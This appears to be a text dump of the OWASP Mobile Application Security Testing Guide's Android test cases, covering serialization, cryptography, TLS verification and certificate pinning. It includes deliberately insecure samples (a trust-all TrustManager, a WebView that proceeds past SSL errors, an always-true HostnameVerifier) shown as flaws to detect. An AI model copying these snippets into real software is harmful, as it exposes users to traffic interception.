tags. Instead, shouldInterceptRequest
should take care of this.shouldInterceptRequest
allows the application to return the data from resource requests. If the return value is null, the WebView will continue to load the resource as usual. Otherwise, the data returned by the shouldInterceptRequest
method is used. Considerations:http(s):
, data:
, file:
, etc.), not only those schemes which send requests over the network.javascript:
or blob:
URLs, or for assets accessed via file:///android_asset/
or file:///android_res/
URLs. In the case of redirects, this is only called for the initial resource URL, not any subsequent redirect URLs.setSafeBrowsingWhitelist
or even ignore the warning via the onSafeBrowsingHit
callback.As you can see there are a lot of points to consider when testing the security of WebViews that have a WebViewClient configured, so be sure to carefully read and understand all of them by checking the WebViewClient
Documentation.
While the default value of EnableSafeBrowsing
is true
, some applications might opt to disable it. To verify that SafeBrowsing is enabled, inspect the AndroidManifest.xml file and make sure that the configuration below is not present:
<manifest>\n <application>\n <meta-data android:name=\"android.webkit.WebView.EnableSafeBrowsing\"\n android:value=\"false\" />\n ...\n </application>\n</manifest>\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0027/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test deep linking is to use Frida or frida-trace and hook the shouldOverrideUrlLoading
, shouldInterceptRequest
methods while using the app and clicking on links within the WebView. Be sure to also hook other related Uri
methods such as getHost
, getScheme
or getPath
which are typically used to inspect the requests and match known patterns or deny lists.
To test for object persistence being used for storing sensitive information on the device, first identify all instances of object serialization and check if they carry any sensitive data. If yes, check if is properly protected against eavesdropping or unauthorized modification.
There are a few generic remediation steps that you can always take:
For high-risk applications that focus on availability, we recommend that you use Serializable
only when the serialized classes are stable. Second, we recommend not using reflection-based persistence because
See the chapter \"Android Anti-Reversing Defenses\" for more details.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#object-serialization","title":"Object Serialization","text":"Search the source code for the following keywords:
import java.io.Serializable
implements Serializable
If you need to counter memory-dumping, make sure that very sensitive information is not stored in the JSON format because you can't guarantee prevention of anti-memory dumping techniques with the standard libraries. You can check for the following keywords in the corresponding libraries:
JSONObject
Search the source code for the following keywords:
import org.json.JSONObject;
import org.json.JSONArray;
GSON
Search the source code for the following keywords:
import com.google.gson
import com.google.gson.annotations
import com.google.gson.reflect
import com.google.gson.stream
new Gson();
@Expose
, @JsonAdapter
, @SerializedName
,@Since
, and @Until
Jackson
Search the source code for the following keywords:
import com.fasterxml.jackson.core
import org.codehaus.jackson
for the older version.When you use an ORM library, make sure that the data is stored in an encrypted database and the class representations are individually encrypted before storing it. See the chapters \"Data Storage on Android\" and \"Android Cryptographic APIs\" for more details. You can check for the following keywords in the corresponding libraries:
OrmLite
Search the source code for the following keywords:
import com.j256.*
import com.j256.dao
import com.j256.db
import com.j256.stmt
import com.j256.table\\
Please make sure that logging is disabled.
SugarORM
Search the source code for the following keywords:
import com.github.satyan
extends SugarRecord<Type>
meta-data
entries with values such as DATABASE
, VERSION
, QUERY_LOG
and DOMAIN_PACKAGE_NAME
.Make sure that QUERY_LOG
is set to false.
GreenDAO
Search the source code for the following keywords:
import org.greenrobot.greendao.annotation.Convert
import org.greenrobot.greendao.annotation.Entity
import org.greenrobot.greendao.annotation.Generated
import org.greenrobot.greendao.annotation.Id
import org.greenrobot.greendao.annotation.Index
import org.greenrobot.greendao.annotation.NotNull
import org.greenrobot.greendao.annotation.*
import org.greenrobot.greendao.database.Database
import org.greenrobot.greendao.query.Query
ActiveAndroid
Search the source code for the following keywords:
ActiveAndroid.initialize(<contextReference>);
import com.activeandroid.Configuration
import com.activeandroid.query.*
Realm
Search the source code for the following keywords:
import io.realm.RealmObject;
import io.realm.annotations.PrimaryKey;
Make sure that appropriate security measures are taken when sensitive information is stored in an Intent via a Bundle that contains a Parcelable. Use explicit Intents and verify proper additional security controls when using application-level IPC (e.g., signature verification, intent-permissions, crypto).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0034/#dynamic-analysis","title":"Dynamic Analysis","text":"There are several ways to perform dynamic analysis:
To test for enforced updating you need to check if the app has support for in-app updates and validate if it's properly enforced so that the user is not able to continue using the app without updating it first.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#static-analysis","title":"Static analysis","text":"The code sample below shows the example of an app-update:
//Part 1: check for update\n// Creates instance of the manager.\nAppUpdateManager appUpdateManager = AppUpdateManagerFactory.create(context);\n\n// Returns an intent object that you use to check for an update.\nTask<AppUpdateInfo> appUpdateInfo = appUpdateManager.getAppUpdateInfo();\n\n// Checks that the platform will allow the specified type of update.\nif (appUpdateInfo.updateAvailability() == UpdateAvailability.UPDATE_AVAILABLE\n // For a flexible update, use AppUpdateType.FLEXIBLE\n && appUpdateInfo.isUpdateTypeAllowed(AppUpdateType.IMMEDIATE)) {\n\n\n\n //...Part 2: request update\n appUpdateManager.startUpdateFlowForResult(\n // Pass the intent that is returned by 'getAppUpdateInfo()'.\n appUpdateInfo,\n // Or 'AppUpdateType.FLEXIBLE' for flexible updates.\n AppUpdateType.IMMEDIATE,\n // The current activity making the update request.\n this,\n // Include a request code to later monitor this update request.\n MY_REQUEST_CODE);\n\n\n\n //...Part 3: check if update completed successfully\n @Override\n public void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (myRequestCode == MY_REQUEST_CODE) {\n if (resultCode != RESULT_OK) {\n log(\"Update flow failed! Result code: \" + resultCode);\n // If the update is cancelled or fails,\n // you can request to start the update again in case of forced updates\n }\n }\n }\n\n //..Part 4:\n // Checks that the update is not stalled during 'onResume()'.\n// However, you should execute this check at all entry points into the app.\n@Override\nprotected void onResume() {\n super.onResume();\n\n appUpdateManager\n .getAppUpdateInfo()\n .addOnSuccessListener(\n appUpdateInfo -> {\n ...\n if (appUpdateInfo.updateAvailability()\n == UpdateAvailability.DEVELOPER_TRIGGERED_UPDATE_IN_PROGRESS) {\n // If an in-app update is already running, resume the update.\n manager.startUpdateFlowForResult(\n appUpdateInfo,\n IMMEDIATE,\n this,\n MY_REQUEST_CODE);\n }\n });\n}\n}\n
Source: https://developer.android.com/guide/app-bundle/in-app-updates
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0036/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Lastly, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#static-analysis","title":"Static Analysis","text":"Detecting vulnerabilities in third party dependencies can be done by means of the OWASP Dependency checker. This is best done by using a gradle plugin, such as dependency-check-gradle
. In order to use the plugin, the following steps need to be applied: Install the plugin from the Maven central repository by adding the following script to your build.gradle:
buildscript {\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.owasp:dependency-check-gradle:3.2.0'\n }\n}\n\napply plugin: 'org.owasp.dependencycheck'\n
Once gradle has invoked the plugin, you can create a report by running:
gradle assemble\ngradle dependencyCheckAnalyze --info\n
The report will be in build/reports
unless otherwise configured. Use the report in order to analyze the vulnerabilities found. See remediation on what to do given the vulnerabilities found with the libraries.
Please be advised that the plugin requires to download a vulnerability feed. Consult the documentation in case issues arise with the plugin.
Lastly, please note that for hybrid applications, one will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, one will have to check the C# dependencies.
When a library is found to contain vulnerabilities, then the following reasoning applies:
When the sources are not available, one can decompile the app and check the JAR files. When Dexguard or ProGuard are applied properly, then version information about the library is often obfuscated and therefore gone. Otherwise you can still find the information very often in the comments of the Java files of given libraries. Tools such as MobSF can help in analyzing the possible libraries packed with the application. If you can retrieve the version of the library, either via comments, or via specific methods used in certain versions, you can look them up for CVEs by hand.
If the application is a high-risk application, you will end up vetting the library manually. In that case, there are specific requirements for native code, which you can find in the chapter \"Testing Code Quality\". Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0042/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises validating whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copyright statements are noted as required by the license of the third party library.
There are various items to look for:
Note that there can be Memory leaks in Java/Kotlin code as well. Look for various items, such as: BroadcastReceivers which are not unregistered, static references to Activity
or View
classes, Singleton classes that have references to Context
, Inner Class references, Anonymous Class references, AsyncTask references, Handler references, Threading done wrong, TimerTask references. For more details, please check:
There are various steps to take:
Test the app native libraries to determine if they have the PIE and stack smashing protections enabled.
You can use radare2's rabin2 to get the binary information. We'll use the UnCrackable App for Android Level 4 v1.0 APK as an example.
All native libraries must have canary
and pic
both set to true
.
That's the case for libnative-lib.so
:
rabin2 -I lib/x86_64/libnative-lib.so | grep -E \"canary|pic\"\ncanary true\npic true\n
But not for libtool-checker.so
:
rabin2 -I lib/x86_64/libtool-checker.so | grep -E \"canary|pic\"\ncanary false\npic true\n
In this example, libtool-checker.so
must be recompiled with stack smashing protection support.
Identify all the instances of symmetric key encryption in code and look for any mechanism which loads or provides a symmetric key. You can look for:
DES
, AES
, etc.)KeyGenParameterSpec
, KeyPairGeneratorSpec
, KeyPairGenerator
, KeyGenerator
, KeyProperties
, etc.)java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
Check also the list of common cryptographic configuration issues.
For each identified instance verify if the used symmetric keys:
For each hardcoded symmetric key, verify that is not used in security-sensitive contexts as the only method of encryption.
As an example we illustrate how to locate the use of a hardcoded encryption key. First disassemble and decompile the app to obtain Java code, e.g. by using jadx.
Now search the files for the usage of the SecretKeySpec
class, e.g. by simply recursively grepping on them or using jadx search function:
grep -r \"SecretKeySpec\"\n
This will return all classes using the SecretKeySpec
class. Now examine those files and trace which variables are used to pass the key material. The figure below shows the result of performing this assessment on a production ready application. We can clearly locate the use of a static encryption key that is hardcoded and initialized in the static byte array Encrypt.keyBytes
.
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/","title":"Testing the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#static-analysis","title":"Static Analysis","text":"Identify all the instances of the cryptographic primitives in code. Identify all custom cryptography implementations. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
and android.security.keystore.*
packages.Identify that all calls to getInstance use default provider
of security services by not specifying it (it means AndroidOpenSSL aka Conscrypt). Provider
can only be specified in KeyStore
related code (in that situation KeyStore
should be provided as provider
). If other provider
is specified it should be verified according to situation and business case (i.e. Android API version), and provider
should be examined against potential vulnerabilities.
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0014/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/","title":"Testing the Purposes of Keys","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0015/#static-analysis","title":"Static Analysis","text":"Identify all instances where cryptography is used. You can look for:
Cipher
, Mac
, MessageDigest
, Signature
Key
, PrivateKey
, PublicKey
, SecretKey
getInstance
, generateKey
KeyStoreException
, CertificateException
, NoSuchAlgorithmException
java.security.*
, javax.crypto.*
, android.security.*
, android.security.keystore.*
For each identified instance, identify its purpose and its type. It can be used:
Additionally, you should identify the business logic which uses identified instances of cryptography.
During verification the following checks should be performed:
You can use method tracing on cryptographic methods to determine input / output values such as the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from. For example, monitor the file system by using the API monitor of RMS - Runtime Mobile Security.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#static-analysis","title":"Static Analysis","text":"Identify all the instances of random number generators and look for either custom or well-known insecure classes. For instance, java.util.Random
produces an identical sequence of numbers for each given seed value; consequently, the sequence of numbers is predictable. Instead a well-vetted algorithm should be chosen that is currently considered to be strong by experts in the field, and a well-tested implementations with adequate length seeds should be used.
Identify all instances of SecureRandom
that are not created using the default constructor. Specifying the seed value may reduce randomness. Prefer the no-argument constructor of SecureRandom
that uses the system-specified seed value to generate a 128-byte-long random number.
In general, if a PRNG is not advertised as being cryptographically secure (e.g. java.util.Random
), then it is probably a statistical PRNG and should not be used in security-sensitive contexts. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 128-bit seed is a good starting point for producing a \"random enough\" number.
Once an attacker knows what type of weak pseudo-random number generator (PRNG) is used, it can be trivial to write a proof-of-concept to generate the next random value based on previously observed ones, as it was done for Java Random. In case of very weak custom random generators it may be possible to observe the pattern statistically. Although the recommended approach would anyway be to decompile the APK and inspect the algorithm (see Static Analysis).
If you want to test for randomness, you can try to capture a large set of numbers and check with the Burp's sequencer to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/android/MASVS-CRYPTO/MASTG-TEST-0016/#dynamic-analysis","title":"Dynamic Analysis","text":"You can use method tracing on the mentioned classes and methods to determine input / output values being used.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using HttpsURLConnection
or SSLSocket
(for socket-level communication using TLS).
Next, even when using a low-level API which is supposed to make secure connections (such as SSLSocket
), be aware that it has to be securely implemented. For instance, SSLSocket
doesn't verify the hostname. Use getDefaultHostnameVerifier
to verify the hostname. The Android developer documentation includes a code example.
Next, you should ensure that the app is not allowing cleartext HTTP traffic. Since Android 9 (API level 28) cleartext HTTP traffic is blocked by default (thanks to the default Network Security Configuration) but there are multiple ways in which an application can still send it:
android:usesCleartextTraffic
attribute of the <application>
tag in the AndroidManifest.xml file. Note that this flag is ignored in case the Network Security Configuration is configured.cleartextTrafficPermitted
attribute to true on <domain-config>
elements.Socket
) to set up a custom HTTP connection.All of the above cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Android Manifest or Network Security Configuration, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which Network Security Configuration is ignored) or a badly configured cross-platform framework.
For more information refer to the article \"Security with HTTPS and SSL\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0019/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Refer to section \"Verifying the TLS Settings\" in chapter \"Mobile App Network Communication\" for details.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/","title":"Testing Endpoint Identify Verification","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
Two key issues should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Android documentation. Search the code for examples of TrustManager
and HostnameVerifier
usage. In the sections below, you can find examples of the kind of insecure usage that you should look for.
Note that from Android 8.0 (API level 26) onward, there is no support for SSLv3 and HttpsURLConnection
will no longer perform a fallback to an insecure TLS/SSL protocol.
Applications targeting Android 7.0 (API level 24) or higher will use a default Network Security Configuration that doesn't trust any user supplied CAs, reducing the possibility of MITM attacks by luring users to install malicious CAs.
Decode the app using apktool and verify that the targetSdkVersion
in apktool.yml is equal to or higher than 24
.
grep targetSdkVersion UnCrackable-Level3/apktool.yml\n targetSdkVersion: '28'\n
However, even if targetSdkVersion >=24
, the developer can disable default protections by using a custom Network Security Configuration defining a custom trust anchor forcing the app to trust user supplied CAs. See \"Analyzing Custom Trust Anchors\".
Search for the Network Security Configuration file and inspect any custom <trust-anchors>
defining <certificates src=\"user\">
(which should be avoided).
You should carefully analyze the precedence of entries:
<domain-config>
entry or in a parent <domain-config>
, the configurations in place will be based on the <base-config>
Take a look at this example of a Network Security Configuration for an app targeting Android 9 (API level 28):
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n <domain includeSubdomains=\"false\">owasp.org</domain>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </domain-config>\n</network-security-config>\n
Some observations:
<base-config>
, meaning that the default configuration for Android 9 (API level 28) or higher will be used for all other connections (only system
CA will be trusted in principle).<domain-config>
overrides the default configuration allowing the app to trust both system
and user
CAs for the indicated <domain>
(owasp.org).includeSubdomains=\"false\"
.Putting all together we can translate the above Network Security Configuration to: \"the app trusts system and user CAs for the owasp.org domain, excluding its subdomains. For any other domains the app will trust the system CAs only\".
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#verifying-the-server-certificate","title":"Verifying the Server Certificate","text":"TrustManager
is a means of verifying conditions necessary for establishing a trusted connection in Android. The following conditions should be checked at this point:
The following code snippet is sometimes used during development and will accept any certificate, overwriting the functions checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
. Such implementations should be avoided, and, if they are necessary, they should be clearly separated from production builds to avoid built-in security flaws.
TrustManager[] trustAllCerts = new TrustManager[] {\n new X509TrustManager() {\n @Override\n public X509Certificate[] getAcceptedIssuers() {\n return new java.security.cert.X509Certificate[] {};\n }\n\n @Override\n public void checkClientTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n\n @Override\n public void checkServerTrusted(X509Certificate[] chain, String authType)\n throws CertificateException {\n }\n }\n };\n\n// SSLContext context\ncontext.init(null, trustAllCerts, new SecureRandom());\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#webview-server-certificate-verification","title":"WebView Server Certificate Verification","text":"Sometimes applications use a WebView to render the website associated with the application. This is true of HTML/JavaScript-based frameworks such as Apache Cordova, which uses an internal WebView for application interaction. When a WebView is used, the mobile browser performs the server certificate validation. Ignoring any TLS error that occurs when the WebView tries to connect to the remote website is a bad practice.
The following code will ignore TLS issues, exactly like the WebViewClient custom implementation provided to the WebView:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n @Override\n public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {\n //Ignore TLS certificate errors and instruct the WebViewClient to load the website\n handler.proceed();\n }\n});\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#apache-cordova-certificate-verification","title":"Apache Cordova Certificate Verification","text":"Implementation of the Apache Cordova framework's internal WebView usage will ignore TLS errors in the method onReceivedSslError
if the flag android:debuggable
is enabled in the application manifest. Therefore, make sure that the app is not debuggable. See the test case \"Testing If the App is Debuggable\".
Another security flaw in client-side TLS implementations is the lack of hostname verification. Development environments usually use internal addresses instead of valid domain names, so developers often disable hostname verification (or force an application to allow any hostname) and simply forget to change it when their application goes to production. The following code disables hostname verification:
final static HostnameVerifier NO_VERIFY = new HostnameVerifier() {\n public boolean verify(String hostname, SSLSession session) {\n return true;\n }\n};\n
With a built-in HostnameVerifier
, accepting any hostname is possible:
HostnameVerifier NO_VERIFY = org.apache.http.conn.ssl.SSLSocketFactory\n .ALLOW_ALL_HOSTNAME_VERIFIER;\n
Make sure that your application verifies a hostname before setting a trusted connection.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0021/#dynamic-analysis","title":"Dynamic Analysis","text":"When testing an app targeting Android 7.0 (API level 24) or higher it should be effectively applying the Network Security Configuration and you shouldn't able to see the decrypted HTTPS traffic at first. However, if the app targets API levels below 24, the app will automatically accept the installed user certificates.
To test improper certificate verification launch a MITM attack using an interception proxy such as Burp. Try the following options:
If you're still not able to see any decrypted HTTPS traffic, your application might be implementing certificate pinning.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-security-configuration","title":"Network Security Configuration","text":"Inspect the Network Security Configuration looking for any <pin-set>
elements. Check their expiration
date, if any. If expired, certificate pinning will be disabled for the affected domains.
Testing Tip: If a certificate pinning validation check has failed, the following event should be logged in the system logs:
I/X509Util: Failed to validate the certificate chain, error: Pin verification failed\n
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#trustmanager","title":"TrustManager","text":"Implementing certificate pinning involves three main steps:
To analyze the correct implementation of certificate pinning, the HTTP client should load the KeyStore:
InputStream in = resources.openRawResource(certificateRawResource);\nkeyStore = KeyStore.getInstance(\"BKS\");\nkeyStore.load(resourceStream, password);\n
Once the KeyStore has been loaded, we can use the TrustManager that trusts the CAs in our KeyStore:
String tmfAlgorithm = TrustManagerFactory.getDefaultAlgorithm();\nTrustManagerFactory tmf = TrustManagerFactory.getInstance(tmfAlgorithm);\ntmf.init(keyStore);\n// Create an SSLContext that uses the TrustManager\n// SSLContext context = SSLContext.getInstance(\"TLS\");\nsslContext.init(null, tmf.getTrustManagers(), null);\n
The app's implementation may be different, pinning against the certificate's public key only, the whole certificate, or a whole certificate chain.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#network-libraries-and-webviews","title":"Network Libraries and WebViews","text":"Applications that use third-party networking libraries may utilize the libraries' certificate pinning functionality. For example, okhttp can be set up with the CertificatePinner
as follows:
OkHttpClient client = new OkHttpClient.Builder()\n .certificatePinner(new CertificatePinner.Builder()\n .add(\"example.com\", \"sha256/UwQAapahrjCOjYI3oLUx5AQxPBR02Jz6/E2pt0IeLXA=\")\n .build())\n .build();\n
Applications that use a WebView component may utilize the WebViewClient's event handler for some kind of \"certificate pinning\" of each request before the target resource is loaded. The following code shows an example verification:
WebView myWebView = (WebView) findViewById(R.id.webview);\nmyWebView.setWebViewClient(new WebViewClient(){\n private String expectedIssuerDN = \"CN=Let's Encrypt Authority X3,O=Let's Encrypt,C=US;\";\n\n @Override\n public void onLoadResource(WebView view, String url) {\n //From Android API documentation about \"WebView.getCertificate()\":\n //Gets the SSL certificate for the main top-level page\n //or null if there is no certificate (the site is not secure).\n //\n //Available information on SslCertificate class are \"Issuer DN\", \"Subject DN\" and validity date helpers\n SslCertificate serverCert = view.getCertificate();\n if(serverCert != null){\n //apply either certificate or public key pinning comparison here\n //Throw exception to cancel resource loading...\n }\n }\n }\n});\n
Alternatively, it is better to use an OkHttpClient with configured pins and let it act as a proxy overriding shouldInterceptRequest
of the WebViewClient
.
Applications developed in Xamarin will typically use ServicePointManager
to implement pinning.
Normally a function is created to check the certificate(s) and return the boolean value to the method ServerCertificateValidationCallback
:
[Activity(Label = \"XamarinPinning\", MainLauncher = true)]\n public class MainActivity : Activity\n {\n // SupportedPublicKey - Hexadecimal value of the public key.\n // Use GetPublicKeyString() method to determine the public key of the certificate we want to pin. Uncomment the debug code in the ValidateServerCertificate function a first time to determine the value to pin.\n private const string SupportedPublicKey = \"3082010A02820101009CD30CF05AE52E47B7725D3783B...\"; // Shortened for readability\n\n private static bool ValidateServerCertificate(\n object sender,\n X509Certificate certificate,\n X509Chain chain,\n SslPolicyErrors sslPolicyErrors\n )\n {\n //Log.Debug(\"Xamarin Pinning\",chain.ChainElements[X].Certificate.GetPublicKeyString());\n //return true;\n return SupportedPublicKey == chain.ChainElements[1].Certificate.GetPublicKeyString();\n }\n\n protected override void OnCreate(Bundle savedInstanceState)\n {\n System.Net.ServicePointManager.ServerCertificateValidationCallback += ValidateServerCertificate;\n base.OnCreate(savedInstanceState);\n SetContentView(Resource.Layout.Main);\n TesteAsync(\"https://security.claudio.pt\");\n\n }\n
In this particular example we are pinning the intermediate CA of the certificate chain. The output of the HTTP response will be available in the system logs.
Sample Xamarin app with the previous example can be obtained on the MASTG repository
After decompressing the APK file, use a .NET decompiler like dotPeak, ILSpy or dnSpy to decompile the app dlls stored inside the 'Assemblies' folder and confirm the usage of the ServicePointManager.
Learn more:
Hybrid applications based on Cordova do not support Certificate Pinning natively, so plugins are used to achieve this. The most common one is PhoneGap SSL Certificate Checker. The check
method is used to confirm the fingerprint and callbacks will determine the next steps.
// Endpoint to verify against certificate pinning.\n var server = \"https://www.owasp.org\";\n // SHA256 Fingerprint (Can be obtained via \"openssl s_client -connect hostname:443 | openssl x509 -noout -fingerprint -sha256\"\n var fingerprint = \"D8 EF 3C DF 7E F6 44 BA 04 EC D5 97 14 BB 00 4A 7A F5 26 63 53 87 4E 76 67 77 F0 F4 CC ED 67 B9\";\n\n window.plugins.sslCertificateChecker.check(\n successCallback,\n errorCallback,\n server,\n fingerprint);\n\n function successCallback(message) {\n alert(message);\n // Message is always: CONNECTION_SECURE.\n // Now do something with the trusted server.\n }\n\n function errorCallback(message) {\n alert(message);\n if (message === \"CONNECTION_NOT_SECURE\") {\n // There is likely a man in the middle attack going on, be careful!\n } else if (message.indexOf(\"CONNECTION_FAILED\") >- 1) {\n // There was no connection (yet). Internet may be down. Try again (a few times) after a little timeout.\n }\n }\n
After decompressing the APK file, Cordova/Phonegap files will be located in the /assets/www folder. The 'plugins' folder will give you the visibility of the plugins used. We will need to search for this methods in the JavaScript code of the application to confirm its usage.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0022/#dynamic-analysis","title":"Dynamic Analysis","text":"Follow the instructions from \"Testing Endpoint Identify Verification > Dynamic Analysis\". If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/","title":"Testing the Security Provider","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#static-analysis","title":"Static Analysis","text":"Applications based on the Android SDK should depend on GooglePlayServices. For example, in the gradle build file, you will find compile 'com.google.android.gms:play-services-gcm:x.x.x'
in the dependencies block. You need to make sure that the ProviderInstaller
class is called with either installIfNeeded
or installIfNeededAsync
. ProviderInstaller
needs to be called by a component of the application as early as possible. Exceptions thrown by these methods should be caught and handled correctly. If the application cannot patch its security provider, it can either inform the API of its less secure state or restrict user actions (because all HTTPS traffic should be deemed riskier in this situation).
If you have access to the source code, check if the app handle any exceptions related to the security provider updates properly, and if it reports to the backend when the application is working with an unpatched security provider. The Android Developer documentation provides different examples showing how to update the Security Provider to prevent SSL exploits.
Lastly, make sure that NDK-based applications bind only to a recent and properly patched library that provides SSL/TLS functionality.
"},{"location":"MASTG/tests/android/MASVS-NETWORK/MASTG-TEST-0023/#dynamic-analysis","title":"Dynamic Analysis","text":"When you have the source code:
Evaluate Expression
.Security.getProviders()
and press enter.GmsCore_OpenSSL
, which should be the new top-listed provider.When you do not have the source code:
java.security
package, then hook into java.security.Security
with the method getProviders
(with no arguments). The return value will be an array of Provider
.GmsCore_OpenSSL
.The first step is to look at AndroidManifest.xml
